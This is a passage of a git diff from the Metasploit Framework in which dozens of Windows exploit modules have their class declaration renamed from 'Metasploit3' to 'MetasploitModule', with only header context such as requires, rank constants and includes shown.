Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb index 5ba781def4..f484664718 100644 --- a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb +++ b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index ff35263e44..2df31f7ccf 100644 --- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index 4638454fcb..053b40eec4 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb index 930a01332d..650dd5f3e5 100644 --- a/modules/exploits/windows/http/steamcast_useragent.rb +++ b/modules/exploits/windows/http/steamcast_useragent.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/sws_connection_bof.rb b/modules/exploits/windows/http/sws_connection_bof.rb index e8bfdbb437..c84081854b 100644 --- a/modules/exploits/windows/http/sws_connection_bof.rb +++ b/modules/exploits/windows/http/sws_connection_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] } diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index e25b6b7075..8be77137c6 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index d770ad3532..b043198646 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index 627868613f..f431fd9289 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trackit_file_upload.rb b/modules/exploits/windows/http/trackit_file_upload.rb index 1d33984b1e..c4cc9ee2fd 100644 --- a/modules/exploits/windows/http/trackit_file_upload.rb +++ b/modules/exploits/windows/http/trackit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index c9482fdcf8..0b1dcff49f 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ultraminihttp_bof.rb b/modules/exploits/windows/http/ultraminihttp_bof.rb index ac5841b53a..1100d1b113 100644 --- a/modules/exploits/windows/http/ultraminihttp_bof.rb +++ b/modules/exploits/windows/http/ultraminihttp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index 683baf2a5c..8cb9460f71 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb index 0a8a6421b9..e6e1375362 100644 --- a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb +++ b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*Win32/ ] } diff --git a/modules/exploits/windows/http/webster_http.rb b/modules/exploits/windows/http/webster_http.rb index 0cec534547..5821ba4e27 100644 --- a/modules/exploits/windows/http/webster_http.rb +++ b/modules/exploits/windows/http/webster_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index 744519e2fd..c39180bfa0 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index bcb6a05fc3..213f3d1b68 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb b/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb index f0623ef54a..a650c6cbbe 100644 --- a/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 3a4eecf03c..4e0e67c8e7 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index 60c0e47956..74f593f2ad 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/iis/ms01_023_printer.rb b/modules/exploits/windows/iis/ms01_023_printer.rb index b425fd66f9..1318d6ac68 100644 --- a/modules/exploits/windows/iis/ms01_023_printer.rb +++ b/modules/exploits/windows/iis/ms01_023_printer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb index b4f2dd6579..5a4738e926 100644 --- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb +++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # NOTE: This cannot be an HttpClient module since the response from the server diff --git a/modules/exploits/windows/iis/ms01_033_idq.rb b/modules/exploits/windows/iis/ms01_033_idq.rb index 284ef19b3a..f631cc4e19 100644 --- a/modules/exploits/windows/iis/ms01_033_idq.rb +++ b/modules/exploits/windows/iis/ms01_033_idq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index c58d7acfc6..017b790caa 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index 3e201893f9..8b8b9ea12e 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index 1b8c895093..98fda64ef1 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index de5f2e17b7..fff453f738 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb index c5f04e6144..035aa5a85f 100644 --- a/modules/exploits/windows/imap/eudora_list.rb +++ b/modules/exploits/windows/imap/eudora_list.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index de067d9294..77a2823617 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/ipswitch_search.rb b/modules/exploits/windows/imap/ipswitch_search.rb index f658c6baa2..403dadfdbf 100644 --- a/modules/exploits/windows/imap/ipswitch_search.rb +++ b/modules/exploits/windows/imap/ipswitch_search.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mailenable_login.rb b/modules/exploits/windows/imap/mailenable_login.rb index 25987fbebe..776059c1bb 100644 --- a/modules/exploits/windows/imap/mailenable_login.rb +++ b/modules/exploits/windows/imap/mailenable_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mailenable_status.rb b/modules/exploits/windows/imap/mailenable_status.rb index d67fcf75c2..9e984b8f5e 100644 --- a/modules/exploits/windows/imap/mailenable_status.rb +++ b/modules/exploits/windows/imap/mailenable_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index e13027054f..f10818b868 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb +++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index 866fcb3116..f15372a824 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index 36ee2fac67..b983440500 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index b24383dc90..f4e2546d73 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mercur_login.rb b/modules/exploits/windows/imap/mercur_login.rb index f243370a84..7b580ad5dc 100644 --- a/modules/exploits/windows/imap/mercur_login.rb +++ b/modules/exploits/windows/imap/mercur_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index 45327f91f3..621ae49de5 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index 4ef6097ca4..8f6bacec40 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_append.rb b/modules/exploits/windows/imap/novell_netmail_append.rb index bae7c3804c..a254c10cd2 100644 --- a/modules/exploits/windows/imap/novell_netmail_append.rb +++ b/modules/exploits/windows/imap/novell_netmail_append.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_auth.rb b/modules/exploits/windows/imap/novell_netmail_auth.rb index eb566db50b..562013f2e4 100644 --- a/modules/exploits/windows/imap/novell_netmail_auth.rb +++ b/modules/exploits/windows/imap/novell_netmail_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index afe668e445..3f0cdc6c27 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_subscribe.rb b/modules/exploits/windows/imap/novell_netmail_subscribe.rb index 340c2ab009..1b317ddc1f 100644 --- a/modules/exploits/windows/imap/novell_netmail_subscribe.rb +++ b/modules/exploits/windows/imap/novell_netmail_subscribe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index 650164ac9e..de284832e7 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb index b9b5f4021a..884a2cb940 100644 --- a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb +++ b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb index bcd830845f..ffa2f21cb0 100644 --- a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index fb6abff5d1..0c03aed308 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb index d870242fdc..0963967016 100644 --- a/modules/exploits/windows/isapi/w3who_query.rb +++ b/modules/exploits/windows/isapi/w3who_query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] } diff --git a/modules/exploits/windows/ldap/imail_thc.rb b/modules/exploits/windows/ldap/imail_thc.rb index 50a1a5f24d..abbb005e30 100644 --- a/modules/exploits/windows/ldap/imail_thc.rb +++ b/modules/exploits/windows/ldap/imail_thc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ldap/pgp_keyserver7.rb b/modules/exploits/windows/ldap/pgp_keyserver7.rb index a193758e93..1e98ff170f 100644 --- a/modules/exploits/windows/ldap/pgp_keyserver7.rb +++ b/modules/exploits/windows/ldap/pgp_keyserver7.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 4a7b594cd8..18ef7a6cb2 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index 21dc18ab0e..0638dbae5b 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb index 28092a2253..1f7d26fd43 100644 --- a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb +++ b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/sentinel_lm7_udp.rb b/modules/exploits/windows/license/sentinel_lm7_udp.rb index 0395c7089c..8fd7714f4b 100644 --- a/modules/exploits/windows/license/sentinel_lm7_udp.rb +++ b/modules/exploits/windows/license/sentinel_lm7_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb index a51426ae9c..cdbd812b7c 100644 --- a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb +++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/agnitum_outpost_acs.rb b/modules/exploits/windows/local/agnitum_outpost_acs.rb index e8982c1720..681a42f712 100644 --- a/modules/exploits/windows/local/agnitum_outpost_acs.rb +++ b/modules/exploits/windows/local/agnitum_outpost_acs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb index 444f67a6de..5e90adb7e0 100644 --- a/modules/exploits/windows/local/always_install_elevated.rb +++ b/modules/exploits/windows/local/always_install_elevated.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb index c48aa4d1ad..60d7f07787 100644 --- a/modules/exploits/windows/local/applocker_bypass.rb +++ b/modules/exploits/windows/local/applocker_bypass.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 00c7b0b0bb..2f724f8609 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Post::Windows::Priv diff --git a/modules/exploits/windows/local/bthpan.rb b/modules/exploits/windows/local/bthpan.rb index e0e5d015cd..b084b24773 100644 --- a/modules/exploits/windows/local/bthpan.rb +++ b/modules/exploits/windows/local/bthpan.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index 8cfb23418c..f5681dbe45 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 9bc5fa4028..3262061082 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/bypassuac_vbs.rb b/modules/exploits/windows/local/bypassuac_vbs.rb index b560da405e..ae10158825 100644 --- a/modules/exploits/windows/local/bypassuac_vbs.rb +++ b/modules/exploits/windows/local/bypassuac_vbs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::FileDropper diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index 58729c5f29..46c9d307fb 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/powershell' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Post::Windows::Services diff --git a/modules/exploits/windows/local/ikeext_service.rb b/modules/exploits/windows/local/ikeext_service.rb index 7278e5aee6..e5c9b15868 100644 --- a/modules/exploits/windows/local/ikeext_service.rb +++ b/modules/exploits/windows/local/ikeext_service.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < 